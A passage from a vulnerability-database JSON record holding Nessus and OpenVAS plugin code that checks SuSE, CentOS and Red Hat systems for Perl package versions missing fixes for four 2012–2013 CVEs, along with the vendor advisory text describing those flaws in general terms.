[bnc#797060]\n [CVE-2012-6329]\n\n - make getgrent work with long group entries [bnc#788388]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-2728.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-5526.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-6329.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1667.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 8479.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"TWiki 5.1.2 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'TWiki MAKETEXT Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2020 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"perl-5.8.8-14.21.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, cpu:\"x86_64\", reference:\"perl-32bit-5.8.8-14.21.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"perl-5.8.8-14.21.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"perl-32bit-5.8.8-14.21.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2018-01-19T15:09:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5195", "CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329"], "description": "Check for the Version of perl", "modified": "2018-01-19T00:00:00", "published": "2013-03-28T00:00:00", "id": "OPENVAS:881700", "href": "http://plugins.openvas.org/nasl.php?oid=881700", "type": "openvas", "title": "CentOS Update for perl CESA-2013:0685 centos5 ", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for perl CESA-2013:0685 centos5 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Perl is a high-level programming language commonly used for system\n administration utilities and web programming.\n\n A heap overflow flaw was found in Perl. If a Perl application allowed\n user input to control the count argument of the string repeat operator, an\n attacker could cause the application to crash or, potentially, execute\n arbitrary code with the privileges of the user running the application.\n (CVE-2012-5195)\n \n A denial of service flaw was found in the way Perl's rehashing code\n implementation, responsible for recalculation of hash keys and\n redistribution of hash content, handled certain input. If an attacker\n supplied specially-crafted input to be used as hash keys by a Perl\n application, it could cause excessive memory consumption. (CVE-2013-1667)\n \n It was found that the Perl CGI module, used to handle Common Gateway\n Interface requests and responses, incorrectly sanitized the values for\n Set-Cookie and P3P headers. If a Perl application using the CGI module\n reused cookies values and accepted untrusted input from web browsers, a\n remote attacker could use this flaw to alter member items of the cookie or\n add new items. (CVE-2012-5526)\n \n It was found that the Perl Locale::Maketext module, used to localize Perl\n applications, did not properly handle backslashes or fully-qualified method\n names. An attacker could possibly use this flaw to execute arbitrary Perl\n code with the privileges of a Perl application that uses untrusted\n Locale::Maketext templates. (CVE-2012-6329)\n \n Red Hat would like to thank the Perl project for reporting CVE-2012-5195\n and CVE-2013-1667. Upstream acknowledges Tim Brown as the original\n reporter of CVE-2012-5195 and Yves Orton as the original reporter of\n CVE-2013-1667.\n \n All Perl users should upgrade to these updated packages, which contain\n backported patches to correct these issues. All running Perl programs\n must be restarted for this update to take effect.\";\n\n\ntag_affected = \"perl on CentOS 5\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2013-March/019668.html\");\n script_id(881700);\n script_version(\"$Revision: 8466 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-19 07:58:30 +0100 (Fri, 19 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-28 09:49:47 +0530 (Thu, 28 Mar 2013)\");\n script_cve_id(\"CVE-2012-5195\", \"CVE-2012-5526\", \"CVE-2012-6329\", \"CVE-2013-1667\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2013:0685\");\n script_name(\"CentOS Update for perl CESA-2013:0685 centos5 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of perl\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"perl\", rpm:\"perl~5.8.8~40.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-suidperl\", rpm:\"perl-suidperl~5.8.8~40.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5195", "CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-03-28T00:00:00", "id": "OPENVAS:1361412562310881698", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881698", "type": "openvas", "title": "CentOS Update for perl CESA-2013:0685 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for perl CESA-2013:0685 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_tag(name:\"affected\", value:\"perl on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"Perl is a high-level programming language commonly used for system\n administration utilities and web programming.\n\n A heap overflow flaw was found in Perl. If a Perl application allowed\n user input to control the count argument of the string repeat operator, an\n attacker could cause the application to crash or, potentially, execute\n arbitrary code with the privileges of the user running the application.\n (CVE-2012-5195)\n\n A denial of service flaw was found in the way Perl's rehashing code\n implementation, responsible for recalculation of hash keys and\n redistribution of hash content, handled certain input. If an attacker\n supplied specially-crafted input to be used as hash keys by a Perl\n application, it could cause excessive memory consumption. (CVE-2013-1667)\n\n It was found that the Perl CGI module, used to handle Common Gateway\n Interface requests and responses, incorrectly sanitized the values for\n Set-Cookie and P3P headers. If a Perl application using the CGI module\n reused cookies values and accepted untrusted input from web browsers, a\n remote attacker could use this flaw to alter member items of the cookie or\n add new items. (CVE-2012-5526)\n\n It was found that the Perl Locale::Maketext module, used to localize Perl\n applications, did not properly handle backslashes or fully-qualified method\n names. An attacker could possibly use this flaw to execute arbitrary Perl\n code with the privileges of a Perl application that uses untrusted\n Locale::Maketext templates. (CVE-2012-6329)\n\n Red Hat would like to thank the Perl project for reporting CVE-2012-5195\n and CVE-2013-1667. Upstream acknowledges Tim Brown as the original\n reporter of CVE-2012-5195 and Yves Orton as the original reporter of\n CVE-2013-1667.\n\n All Perl users should upgrade to these updated packages, which contain\n backported patches to correct these issues. All running Perl programs\n must be restarted for this update to take effect.\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2013-March/019669.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881698\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-28 09:49:31 +0530 (Thu, 28 Mar 2013)\");\n script_cve_id(\"CVE-2012-5195\", \"CVE-2012-5526\", \"CVE-2012-6329\", \"CVE-2013-1667\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"CESA\", value:\"2013:0685\");\n script_name(\"CentOS Update for perl CESA-2013:0685 centos6\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'perl'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"perl\", rpm:\"perl~5.10.1~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Archive-Extract\", rpm:\"perl-Archive-Extract~0.38~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Archive-Tar\", rpm:\"perl-Archive-Tar~1.58~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-CGI\", rpm:\"perl-CGI~3.51~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Compress-Raw-Bzip2\", rpm:\"perl-Compress-Raw-Bzip2~2.020~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Compress-Raw-Zlib\", rpm:\"perl-Compress-Raw-Zlib~2.020~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Compress-Zlib\", rpm:\"perl-Compress-Zlib~2.020~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-core\", rpm:\"perl-core~5.10.1~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-CPAN\", rpm:\"perl-CPAN~1.9402~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-CPANPLUS\", rpm:\"perl-CPANPLUS~0.88~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-devel\", rpm:\"perl-devel~5.10.1~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Digest-SHA\", rpm:\"perl-Digest-SHA~5.47~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-ExtUtils-CBuilder\", rpm:\"perl-ExtUtils-CBuilder~0.27~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-ExtUtils-Embed\", rpm:\"perl-ExtUtils-Embed~1.28~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-ExtUtils-MakeMaker\", rpm:\"perl-ExtUtils-MakeMaker~6.55~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-ExtUtils-ParseXS\", rpm:\"perl-ExtUtils-ParseXS~2.2003.0~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-File-Fetch\", rpm:\"perl-File-Fetch~0.26~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-IO-Compress-Base\", rpm:\"perl-IO-Compress-Base~2.020~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-IO-Compress-Bzip2\", rpm:\"perl-IO-Compress-Bzip2~2.020~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-IO-Compress-Zlib\", rpm:\"perl-IO-Compress-Zlib~2.020~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-IO-Zlib\", rpm:\"perl-IO-Zlib~1.09~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-IPC-Cmd\", rpm:\"perl-IPC-Cmd~0.56~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-libs\", rpm:\"perl-libs~5.10.1~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Locale-Maketext-Simple\", rpm:\"perl-Locale-Maketext-Simple~0.18~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Log-Message\", rpm:\"perl-Log-Message~0.02~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Log-Message-Simple\", rpm:\"perl-Log-Message-Simple~0.04~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Module-Build\", rpm:\"perl-Module-Build~0.3500~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Module-CoreList\", rpm:\"perl-Module-CoreList~2.18~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Module-Load\", rpm:\"perl-Module-Load~0.16~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Module-Load-Conditional\", rpm:\"perl-Module-Load-Conditional~0.30~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Module-Loaded\", rpm:\"perl-Module-Loaded~0.02~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Module-Pluggable\", rpm:\"perl-Module-Pluggable~3.90~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Object-Accessor\", rpm:\"perl-Object-Accessor~0.34~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Package-Constants\", rpm:\"perl-Package-Constants~0.02~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Params-Check\", rpm:\"perl-Params-Check~0.26~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-parent\", rpm:\"perl-parent~0.221~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Parse-CPAN-Meta\", rpm:\"perl-Parse-CPAN-Meta~1.40~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Pod-Escapes\", rpm:\"perl-Pod-Escapes~1.04~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Pod-Simple\", rpm:\"perl-Pod-Simple~3.13~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-suidperl\", rpm:\"perl-suidperl~5.10.1~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Term-UI\", rpm:\"perl-Term-UI~0.20~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Test-Harness\", rpm:\"perl-Test-Harness~3.17~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Test-Simple\", rpm:\"perl-Test-Simple~0.92~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Time-HiRes\", rpm:\"perl-Time-HiRes~1.9721~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Time-Piece\", rpm:\"perl-Time-Piece~1.15~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-version\", rpm:\"perl-version~0.77~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5195", "CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2013-03-28T00:00:00", "id": "OPENVAS:1361412562310870972", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870972", "type": "openvas", "title": "RedHat Update for perl RHSA-2013:0685-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for perl RHSA-2013:0685-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2013-March/msg00070.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870972\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-28 09:48:52 +0530 (Thu, 28 Mar 2013)\");\n script_cve_id(\"CVE-2012-5195\", \"CVE-2012-5526\", \"CVE-2012-6329\", \"CVE-2013-1667\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"RHSA\", value:\"2013:0685-01\");\n script_name(\"RedHat Update for perl RHSA-2013:0685-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'perl'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(6|5)\");\n script_tag(name:\"affected\", value:\"perl on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Perl is a high-level programming language commonly used for system\n administration utilities and web programming.\n\n A heap overflow flaw was found in Perl. If a Perl application allowed\n user input to control the count argument of the string repeat operator, an\n attacker could cause the application to crash or, potentially, execute\n arbitrary code with the privileges of the user running the application.\n (CVE-2012-5195)\n\n A denial of service flaw was found in the way Perl's rehashing code\n implementation, responsible for recalculation of hash keys and\n redistribution of hash content, handled certain input. If an attacker\n supplied specially-crafted input to be used as hash keys by a Perl\n application, it could cause excessive memory consumption. (CVE-2013-1667)\n\n It was found that the Perl CGI module, used to handle Common Gateway\n Interface requests and responses, incorrectly sanitized the values for\n Set-Cookie and P3P headers. If a Perl application using the CGI module\n reused cookies values and accepted untrusted input from web browsers, a\n remote attacker could use this flaw to alter member items of the cookie or\n add new items. (CVE-2012-5526)\n\n It was found that the Perl Locale::Maketext module, used to localize Perl\n applications, did not properly handle backslashes or fully-qualified method\n names. An attacker could possibly use this flaw to execute arbitrary Perl\n code with the privileges of a Perl application that uses untrusted\n Locale::Maketext templates. (CVE-2012-6329)\n\n Red Hat would like to thank the Perl project for reporting CVE-2012-5195\n and CVE-2013-1667. Upstream acknowledges Tim Brown as the original\n reporter of CVE-2012-5195 and Yves Orton as the original reporter of\n CVE-2013-1667.\n\n All Perl users should upgrade to these updated packages, which contain\n backported patches to correct these issues. All running Perl programs\n must be restarted for this update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"perl\", rpm:\"perl~5.10.1~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Archive-Extract\", rpm:\"perl-Archive-Extract~0.38~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Archive-Tar\", rpm:\"perl-Archive-Tar~1.58~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-CGI\", rpm:\"perl-CGI~3.51~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-CPAN\", rpm:\"perl-CPAN~1.9402~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-CPANPLUS\", rpm:\"perl-CPANPLUS~0.88~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Compress-Raw-Bzip2\", rpm:\"perl-Compress-Raw-Bzip2~2.020~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Compress-Raw-Zlib\", rpm:\"perl-Compress-Raw-Zlib~2.020~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Compress-Zlib\", rpm:\"perl-Compress-Zlib~2.020~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Digest-SHA\", rpm:\"perl-Digest-SHA~5.47~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-ExtUtils-CBuilder\", rpm:\"perl-ExtUtils-CBuilder~0.27~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-ExtUtils-Embed\", rpm:\"perl-ExtUtils-Embed~1.28~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-ExtUtils-MakeMaker\", rpm:\"perl-ExtUtils-MakeMaker~6.55~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res 